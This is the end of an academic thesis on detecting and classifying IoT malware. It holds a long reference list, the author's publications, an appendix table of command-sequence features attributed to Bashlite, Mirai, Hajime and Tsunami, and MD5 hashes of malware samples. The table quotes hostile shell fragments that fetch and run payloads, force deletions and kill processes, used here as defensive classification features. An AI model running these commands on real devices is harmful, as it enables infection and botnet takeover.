Classification Methods”, In Proceedings of 2016 IEEE Security and Privacy Workshops

(SPW), 2016.

[22]F. Shahzad and M. Farooq, “ELF-Miner: using structural knowledge and data mining

methods to detect new (Linux) malicious executables,” Knowledge and information

systems, vol. 30, no. 3, pp. 589-612, 2012.

[23]J. Bai, Y. Yang, S. Mu, and Y. Ma, “Malware detection through mining symbol table of

Linux executables,” Information Technology Journal, vol. 12, no. 2, pp. 380-384, 2013.

[24]X. Wang, W. Yu, A. Champion, X. Fu, and D. Xuan, “Detecting worms via mining dynamic

program execution,” In Proceedings of 2007 Third International Conference on Security and

Privacy in Communications Networks and the Workshops - SecureComm 2007, pp. 412-

421, 2007.

[25]Ham, Hyo-Sik, et al. “Linear SVM-based android malware detection for reliable IoT

services.” Journal of Applied Mathematics, vol. 2014, 2014.

[26]Azmoodeh, Amin, Ali Dehghantanha, and Kim-Kwang Raymond Choo. "Robust Malware

Detection for Internet Of (Battlefield) Things Devices Using Deep Eigenspace Learning."

IEEE Transactions on Sustainable Computing, 2018.

[27]J. Su, D. V. Vargas, S. Prasad, D. Sgandurra, Y. Feng, and K. Sakurai, “Lightweight

Classification of IoT Malware based on Image Recognition,” In Proceedings of 2018 IEEE

100

42nd Annual Computer Software and Applications Conference (COMPSAC), Tokyo, Japan,

2018.

[28]H., Pareek, S., Romana, and P. R. L. Eswari,(2012). “Application whitelisting: approaches

and challenges.” International Journal of Computer Science, Engineering and Information

Technology (IJCSEIT), 2(5).

[29]S., Obermeier, R., Schierholz, and A., Hristova,(2014, September). “Securing industrial

automation and control systems using application whitelisting.” In Emerging Technology

and Factory Automation (ETFA), 2014 IEEE (pp. 1-4). IEEE.

[30]R., Bhardwaj, M., Daftari, D., John, N., Shinde, and V.Deshpande, (2015). “Whitelisting

and Blacklisting for Private Execution of Processes” in Linux

[31]”Debsums - check the MD5 sums of installed Debian packages.”

http://manpages.ubuntu.com/manpages/zesty/en/man1/debsums.1.html, accessed June 21,

2019,

[32]R., Paleari, L., Martignoni, E., Passerini, D., Davidson, M., Fredrikson, J. T., Giffin, and S.,

Jha, (2010, August). “Automatic Generation of Remediation Procedures for Malware

Infections.” In USENIX Security Symposium, pp. 419-434.

[33]F., Shahzad, S., Bhatti, M., Shahzad, and M., Farooq, (2011, June). “In-execution malware

detection using task structures of linux processes.” In Communications (ICC), 2011 IEEE

International Conference on (pp. 1-6). IEEE.

[34]K., Tamiya, S., Nakayama, Y., Ezawa, Y., Tie, C., Wu, D., Yang, K., Yoshioka, and T.

Matsumoto, (2017). “Experiment on removal and prevention of IoT malware using real

devices.” In Symposium on Cryptography and Information Security 2017, Session 3E1-5,

Naha, Japan, 2017.

[35]M., Koike, N., Ogura, S., Takumi, Y., Hanatani, and H. Haruki, (2017). “Development of

101

WhiteEgret™: A Whitelisting-type Execution Control on Linux.” In Computer Security

Symposium 2017, Session 3D3-4, Yamagata, Japan, 2017.

[36]E., Cozzi, M., Graziano, Y., Fratantonio, and D., Balzarotti. "Understanding linux malware."

In 2018 IEEE Symposium on Security and Privacy (SP), pp. 161-175. IEEE, 2018.

[37]D., Goodin, "BrickerBot, the permanent denial-of-service botnet, is back with a vengeance,"

ARS TECHNICA, https://arstechnica.com/information-technology/2017/04/brickerbot-the-

permanent-denial-of-service-botnet-is-back-with-a-vengeance/, accessed Feb. 06. 2019.

[38]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION

WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-

execution-cve-2017-17020/, accessed Feb. 06. 2019.

[39]M., Jakobsson, and Z., Ramzan, "Crimeware: understanding new attacks and defenses,"

pp17-19, Addison-Wesley Professional, 2008.

[40]A., Luotonen, and k., Altis, "World-wide web proxies," Computer Networks and ISDN

systems, 27(2), pp147-154, 1994.

[41]PF (4), https://www.freebsd.org/cgi/man.cgi?pf, accessed Feb. 06. 2019.

[42]Rieger, G., socat (1) - Linux man page, https://linux.die.net/man/1/socat, accessed Feb. 06.

2019.

[43]P. Eckersley, "How unique is your web browser?" In International Symposium on Privacy

Enhancing Technologies Symposium, pp. 1-18. Springer, Berlin, Heidelberg, July, 2010.

[44]K., Mowery, and H., Shacham, “Pixel perfect: Fingerprinting canvas in HTML5.” In

Proceedings of W2SP, pp1-12, 2012

[45]G., Acar, C., Eubank, S., Englehardt, M., Juarez, A., Narayanan, and C., Diaz, "The web

never forgets: Persistent tracking mechanisms in the wild," In Proceedings of the 2014 ACM

SIGSAC Conference on Computer and Communications Security, pp. 674-689, Nov, 2014.

102

[46]P., Raschke, and A., Küpper, A. "Uncovering Canvas Fingerprinting in Real-Time and

Analyzing ist Usage for Web-Tracking," In Workshops der INFORMATIK 2018-

Architekturen, Prozesse, Sicherheit und Nachhaltigkeit. Köllen Druck+ Verlag GmbH, 2018.

[47]"Valve/fingerprintjs2", https://github.com/Valve/fingerprintjs2, accessed Feb. 06. 2019.

[48]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION

WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-

execution-cve-2017-17020/, accessed Feb. 06. 2019.

[49]METASPLOIT, "D-Link DSL-2750B - OS Command Injection (Metasploit),"

https://www.exploit-db.com/exploits/44760, accessed Feb. 06. 2019.

[50]"Kernel and Device Drivers Layer,"

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Tech

nology_Overview/SystemTechnology/SystemTechnology.html, accessed Feb. 06. 2019.

[51]”mitmproxy”, https://mitmproxy.org/, accessed Feb. 06. 2019.

[52]S., Henning, A. Rao, and R., Lanphier, "Real time streaming protocol (RTSP),"

https://www.ietf.org/rfc/rfc2326.txt, accessed Feb. 06. 2019.

[53]P., Alan, L., Farrell, D., Kemp, and W. Lupton. "Upnp device architecture 1.1." In UPnP

Forum, vol. 22. 2008.

[54]Z., PENG and C., WU, "Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote

Buffer Overflow," Exploit Database, https://www.exploit-db.com/exploits/41738, accessed

Feb. 06. 2019.

[55]METASPLOIT, “D-Link DCS-930L - (Authenticated) Remote Command Execution

(Metasploit),” https://www.exploit-db.com/exploits/39437, accessed Feb. 06. 2019.

[56]Google, "," https://support.google.com/webmasters/answer/182072?hl=en, accessed Feb.

06. 2019.

103

[57]Google, "Verifying Googlebot," https://support.google.com/webmasters/answer/80553,

accessed Feb. 06. 2019

[58]VULNSPY, "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution," https://www.exploit-

db.com/exploits/45978, accessed Feb. 06. 2019.

[59]G., Eberhardt, "AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities,"

https://www.exploit-db.com/exploits/40500, accessed Feb. 06. 2019.

[60]CORE SECURITY, "AirLink101 SkyIPCam1620W - OS Command Injection,"

https://www.exploit-db.com/exploits/37527, accessed Feb. 06. 2019.

[61]Procode701, "Fastweb FASTGate - 0.00.67 RCE Vulnerability,"

https://cxsecurity.com/issue/WLB-2018100117, accessed Feb. 06. 2019.

[62]"CVE-2018-14847," https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847,

accessed Feb. 06. 2019.

[63]HOUSSAMIX, "TUTOS 1.3 - 'cmd.php' Remote Command Execution,"

https://www.exploit-db.com/exploits/4861, accessed Feb. 06. 2019.

[64]V. Total, "Analyze suspicious files and URLs to detect types of malware, automatically

share them with the security community," https://www.virustotal.com/#/home/upload,

accessed Feb. 06. 2019.

[65]B. Krebs, “Source Code for IoT Botnet ‘Mirai’ Released,”

https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-Mirai-released/, accessed

Jan. 18. 2019.

[66]J. Gamblin, “Mirai-Source-Code,” GitHub, https://github.com/jgamblin/Mirai-Source-

Code/, accessed Jan. 18. 2019.

[67]W. H. Gomaa and A. A. Fahmy, “A survey of text similarity approaches," International

Journal of Computer Applications, vol. 68, no. 13, pp. 13-18, 2013.

104

[68]M., Christopher, P., Raghavan, and H., Schütze. "Introduction to information retrieval."

Natural Language Engineering 16.1 (2010), pp. 100-103.

[69]Ukkonen, Esko. "Approximate string-matching with q-grams and maximal matches."

Theoretical computer science 92 no.1 (1992), pp. 191-211

[70]M., Sharma, N., Rajpal, R. B., Reddy, and K. R., Purwar, (2013). Normalised LCS-based

method for indexing multidimensional data cube. International Journal of Intelligent

Information and Database Systems, 7(2), pp. 180-204.

[71]Bakkelund, Daniel. "An LCS-based string metric." Olso, Norway: University of Oslo

(2009).

[72]Heeringa, Wilbert Jan. "Measuring dialect pronunciation differences using Levenshtein

distance." PhD diss., University Library Groningen, pp. 130-132. 2004.

[73]Dreßler, Kevin, and Axel-Cyrille Ngonga Ngomo. "On the efficient execution of bounded

jaro-winkler distances." Semantic Web 8.2 (2017), pp. 185-196.

[74]D. Davidson, “linux.mirai,” https://github.com/0x27/, accessed Jan. 18. 2019.

[75]G. Kondrak, “N-gram similarity and distance,” In International Symposium on String

Processing and Information Retrieval, Springer Berlin Heidelberg, pp.115-126, 2005.

[76]P. F. Brown, P. V. Desouza, R. L. Mercer, V. J. D. Pietra, and J. C. Lai, “Class-based n-gram

models of natural language,” Computational linguistics, vol. 18, no. 4, pp. 467-479, 1992.

[77]I. H. Witten, E. Frank, and M. A. Hall, “Data Mining: Practical machine learning tools and

techniques,” Morgan Kaufmann, 2016.

[78]M. Bailey et al. “Automated classification and analysis of internet malware”. In: Recent

Advances in Intrusion Detection. Ed. by C. Kruegel, L. Lippmann, and Clark Andrew. Vol.

4637. Lecture Notes in ComputerScience, pp. 178–197, 2007

[79]Joachims, Thorsten. "Text categorization with support vector machines: Learning with

105

many relevant features," In European conference on machine learning, pp. 137-142, 1998.

[80]Hotho, Andreas, Andreas Nürnberger, and Gerhard Paaß. "A brief survey of text mining." In

Ldv Forum, vol. 20, no. 1, pp. 19-62, 2005

[81]K. P. Murphy, “Naive bayes classifiers,” University of British Columbia, 2006.

[82]I. Rish, “An empirical study of the naive Bayes classifier,” In IJCAI 2001 workshop on

empirical methods in artificial intelligence, vol. 3, no. 22, pp. 41-46, 2001.

[83]K. Sato, “An inside look at google bigquery. White paper”, Google,

https://cloud.google.com/files/BigQueryTechnicalWP.pdf, accessed Jan. 18. 2019.

[84]F. Pedregosa et al., "Scikit-learn: Machine learning in Python", Journal of Machine

Learning Research, vol. 12, pp. 2825-2830, Oct. 2011.

[85]die.net, “ptmx(4) - Linux man page,” https://linux.die.net/man/4/ptmx., accessed Jan. 18.

2019.

[86]J. Trost, “7up (Mirai?) Triage, More IoT Malware Targeting Weak Passwords,”

http://www.covert.io/7up-mirai-triage-more-iot-malware-targeting-weak-passwords/,

accessed Jan. 18. 2019.

[87]C. Zheng, C. Xiao, and Y. Jia, “IoT Malware Evolves to Harvest Bots by Exploiting a Zero-

day Home Router Vulnerability,” Palo Alto Networks,

https://researchcenter.paloaltonetworks.com/2018/01/unit42-iot-malware-evolves-harvest-

bots-exploiting-zero-day-home-router-vulnerability/, accessed Jan. 18. 2019.

[88]E. Auchard, (2016, November 29). "Deutsche Telekom attack part of global campaign on

routers." https://www.reuters.com/article/us-deutsche-telekom-outages/deutsche-telekom-

attack-part-of-global-campaign-on-routers-idUSKBN13O0X4, accessed Nov. 26. 2017.

[89]L. Franceschi-Bicchierai, (2016, September 29). "How 1.5 Million Connected Cameras

Were Hijacked to Make an Unprecedented Botnet."

106

https://motherboard.vice.com/en_us/article/8q8dab/15-million-connected-cameras-ddos-

botnet-brian-krebs, accessed Nov. 26. 2017.

[90]McAfee, "Embedded Control." http://support.intelsecurity.com/us/products/embedded-

control.aspx, accessed Nov. 20. 2017.

[91]Kaspersky, "Embedded Systems Security 2.0."

https://support.kaspersky.com/kess2#requirements, accessed Nov. 19. 2017.

[92]"Supported embedded operating systems in OfficeScan 10.6."

https://success.trendmicro.com/solution/1060451-supported-embedded-operating-systems-

in-officescan-10-6, accessed Nov. 19. 2017.

[93]Symantec™, "Critical System Protection Version 5.2 RU9 MP6 Platform and Feature

Matrix."

https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUME

NTATION/8000/DOC8022/en_US/SCSP_Platform_Feature_Matrix.pdf?__gda__=1511283

679_42c5dda9b7a1075c7b46cc29d7137977, accessed Nov. 20. 2017.

[94]"User Guide McAfee Embedded Control 6.5.1."

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATI

ON/25000/PD25615/en_US/mec_651_ug_en_us.pdf, accessed Nov.20. 2017.

[95]Symantec, "Critical System Protection 5.2.9 Installation Guide." https://origin-

symwisedownload.symantec.com/resources/sites/SYMWISE/content/live/DOCUMENTATI

ON/5000/DOC5944/en_US/SCSP_Installation_Guide.pdf, accessed Nov. 20. 2017.

[96]"What is GNU/Linux?" http://www.getgnulinux.org/en/linux/, accessed June 21. 2017.

[97]"Yocto Project." https://www.yoctoproject.org/, accessed Nov. 27. 2017.

[98]Yocto Project, "Linux Kernel Development Manual."

http://www.yoctoproject.org/docs/2.0.2/kernel-dev/kernel-dev.html, accessed Nov. 27. 2017.

107

[99]M., Mitchell, J., Oldham, and A. Samuel,(2001). Advanced linux programming (pp. 147-

156). New Riders.

[100]"Proc - process information pseudo-filesystem." http://man7.org/linux/man-

pages/man5/proc.5.html, accessed June 21. 2017.

[101]E. Brown, (2016, October 27). "Open Source Operating Systems for IoT."

https://www.linux.com/news/open-source-operating-systems-iot, accessed July 30. 2017.

[102]B. Nguyen, (2003). "Linux Filesystem Hierarchy."

[103]"fstab - static information about the filesystems." http://man7.org/linux/man-

pages/man5/fstab.5.html, accessed June 21. 2017.

[104]R. Landley, (2005, October 17). "Ramfs, rootfs and initramfs."

https://www.kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt, accessed

July 10. 2017.

[105]P., Lougher, and R., Lougher, (2008). "SquashFS."

[106]G., KH. (2009, August 5). "Driver Core: devtmpfs - kernel-maintained tmpfs-based /dev."

https://lwn.net/Articles/345480/, accessed July 10. 2017.

[107]P. Snyder, (1990, October). "tmpfs: A virtual memory filesystem." In Proceedings of the

autumn 1990 EUUG Conference, pp. 241-248.

[108]P., Mochel, (2005, July). "The sysfs filesystem." In Linux Symposium, p. 313.

[109]N. Brown, (2016, June 1). "Containers, pseudo TTYs, and backward compatibility."

https://lwn.net/Articles/688809/, accessed July 10. 2017.

[110]D. Woodhouse, (2001, July). "JFFS: The journalling flash filesystem." In Ottawa linux

symposium Vol. 2001.

[111]B., Hards, "The Linux USB sub-system." Sigma Bravo Pty Ltd, http://www. linux-

usb.org/USB-guide/book1.html, accessed June 21. 2017.

108

[112]"Vulnerability Details: CVE-2017-7253." http://www.cvedetails.com/cve/CVE-2017-

7253/, accessed July 30. 2017.

[113]C., Cimpanu, (2017, May 11). "40 Asus RT Router Models Are Vulnerable to Simple

Hacks." https://www.bleepingcomputer.com/news/security/40-asus-rt-router-models-are-

vulnerable-to-simple-hacks/, accessed July 30. 2017.

[114]T., Sudo (2016). 無線LAN機器、出荷停止 サイバー攻撃に悪用の恐れ [Shipment

of Wireless LAN equipment is suspended due to fear of abuse in cyber attacks],

http://www.asahi.com/articles/ASJDN5GJ5JDNUUPI00C.html, accessed July 30. 2017.

[115]"VirusTotal Public API v2.0." https://www.virustotal.com/en/documentation/public-api/,

accessed June 23. 2017

[116]F., Lardinois, (Sep. 7, 2012) "Google Acquires Online Virus, Malware and URL Scanner

VirusTotal. TechCrunch." https://techcrunch.com/2012/09/07/google-acquires-online-virus-

malware-and-url-scanner-virustotal/, accessed June 22. 2017.

[117]"IBM Watson IoT". https://github.com/ibm-watson-iot, accessed June 23. 2017.

[118]S., Nanz, and C. A., Furia, (2015, May). "A comparative study of programming languages

in Rosetta Code." In Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE

International Conference on Vol. 1, pp. 778-788. IEEE.

[119]J., Morris, S., Smalley, and G., Kroah-Hartman. (2002, August). "Linux security

modules: General security support for the linux kernel." In USENIX Security Symposium.

109

List of Paper

Reviewed papers in Journals

J-1) Chun-Jung Wu, Ying Tie, Satoshi Hara, Kazuki Tamiya, Akira Fujita, Katsunari

Yoshioka, and Tsutomu Matsumoto. "IoTProtect: Highly Deployable Whitelist-based

Protection for Low-cost Internet-of-Things Devices." Journal of Information Processing

Vol. 26, pp 662-672, Sept. 2018.

J-2) Chun-Jung Wu, Shin-Ying Huang, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT

Malware Analysis and New Pattern Discovery Through Sequence Analysis Using Meta-

Feature Information." The IEICE Transactions on Communications. Vol.E103-B,No.1,

Jan. 2020.

Preparing to submit papers in Journals

J-3) Chun-Jung Wu, Katsunari Yoshioka, and Tsutomu Matsumoto. “ThingGate: A gateway

for managing traffic of bare-metal IoT honeypot.” Journal of Information Processing.

Technical Reports

T-1) Chun-Jung Wu, Ying Tie, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT malware

behavior analysis and classification using text mining algorithm." (2016). In Computer

Security Symposium (CSS), Akita, Japan, Oct. 2016.

T-2) Kazuki Tamiya, Sou Nakayama, Yuta Ezawa, Ying Tie, Chun-Jung Wu, Di Yang,

Katsunari Yoshioka, and Tsutomu Matsumoto. (2017). “Experiment on removal and

prevention of IoT malware using real devices.” In Symposium on Cryptography and

Information Security 2017, Session 3E1-5, Naha, Japan, 2017.

110

Appendix Appendix A The text features and family of clusters

THE TEXT FEATURES AND FAMILY OF CLUSTERS.

Feature

Id

ECT index/

cluster size (*)

Cluster id Text features Family Numbers of

ECTs

1 (4) 25 rm -rf ; pkill -9 ;killall -9 ;, shell, cd /tmp || cd /var/system || cd /mnt || cd

/lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*

Bashlite 4

2 4224 26 cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /,

wget/tftp/get/ftpget, chmod, sh, rm

Bashlite 1

3 (10) 21 cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /,

wget/tftp/get/ftpget, chmod, sh, rm

Bashlite (&

Tsunami)

10

4 3452 22 >/dev/netslink/.t && cd /dev/netslink/ Bashlite 1

5 397 23 cd /tmp; rm -fr *; wget/curl/tftp/get/ftpget, chmod, sh, rm Bashlite 1

6 (37) 20 '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx &&

cd /dev/', '>/mnt/.ptmx && cd /mnt/',

Mirai

variant

37

7 (9) 19 '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx &&

cd /dev/', '>/mnt/.ptmx && cd /mnt/',

Bashlite

variant

9

8 3665 24 >/dev/.t && cd /dev/;>pppd, >/var/tmp/.t && cd /var/tmp/;>pppd, Bashlite

variant

1

9 (69) 17 /bin/busybox ECCHI, /bin/busybox ps; Mirai 69

10 (3374) 16 /bin/busybox ECCHI, /bin/busybox ps; Mirai 3374

11 823 18 /bin/busybox ECCHI, /bin/busybox ps; Mirai 1

12 (4) 15 wget [url]l -O - > dvrHelper; chmod 777 ; /bin/busybox ECCHI Mirai 4

13 (151) 13 (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), Hajime 151

14 2236 14 (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), Hajime 1

15 (2) 12 (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), Hajime 2

16 4080 11 cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var Bashlite 1

17 3017 10 cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var Bashlite 1

18 (4) 9 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /, wget/tftp/get/ftpget,

chmod, sh, rm

Bashlite 4

111

19 916 27 busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf, cd /var || cd

/tmp || cd /var/run || cd /var/tmp || cd /dev || cd /dev/shm || cd /mnt || cd

/boot || cd /usr || cd /dev/netslink

Bashlite 1

20 (3) 8 sh || bash || shell, cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var Bashlite 3

21 (2) 6 cd /tmp; wget || curl -O ; chmod 777 ; sh Bashlite 2

22 3703 7 cd /tmp; wget || curl -O ; chmod 777 ; sh Bashlite 1

23 (3) 3 sh, shell, help, busybox, wget Mirai 3

24 2520 4 sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh || bash ; rm -rf ; Mirai 1

25 2896 5 sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh || bash ; rm -rf ; Mirai 1

26 (5) 2 chmod a+x 7up;./7up., system., /bin/busybox Mirai. Mirai

variant

5

27 726 28 cd /tmp, wget/tftp/get/ftpget, chmod, sh, rm Bashlite 1

28 3921 29 busybox wget || wget [url] || tftp [url]; sh Bashlite 1

29 (934) 1 killall wget; killall ping; killall sh while true; do wget -O /dev/null [url]

> /dev/null 2>

Unknow 934

30 325 30 /bin/busybox MIRAI., cd /var/tmp ;cd /tmp; rm -f *; ftpget, sh & Mirai 1

Appendix B THE MD5 OF MALWARE TSUNAMI (APRIL 2017, FEATURE ID 3 OF APPENDIX

A).

THE MD5 OF MALWARE TSUNAMI (APRIL 2017, FEATURE ID 3 OF APPENDIX A).

MD5

10f045aa890077adc300ea79686eefba

1920b61e9c1e001e2c651bc9ffd59b1a

196dfd58285222b20d6d3434645114e2

25060f2d2d53e80bf01e77ccbabab077

305f120d4893c293faeb368c31ab0913

4312ad5c366a7e500d23883617db8ead

4e9f282659dcc1cd3e9aa9df69d1f9ae

55e1a814fc007a7ac145d8a1f112da9e

112

571c52660cb9f6f0f3f17f25e871251f

6fae1bce8953e9e16b0fd12361690d23

6ff6033745023abb23277df7de2ae69b

71b3589cd99aa176abd68f647d69bbe7

cd3e728914ba6917911423893d95a75a

cea45d9ad8b5339dbc34bb9d072785f0

d78438bcc89b4ecb62bc089ee4691cb0

d8d5807d12eb2acbdff7eb893b87364f

db2e7c2234302e9db0c47b0891104074

dd900a26248a1d01a3b0cf1c65e8bc44

dd90f88f4028e710da9649d370fda93b

de2569ffa1765d9203397b6b7728358b

f1599964e69bc3d0639a47b38badcdf6

f2f49696f944e793daf73e4de9c67c54

f6c3613139f0f36fa93e88c0ecc13a25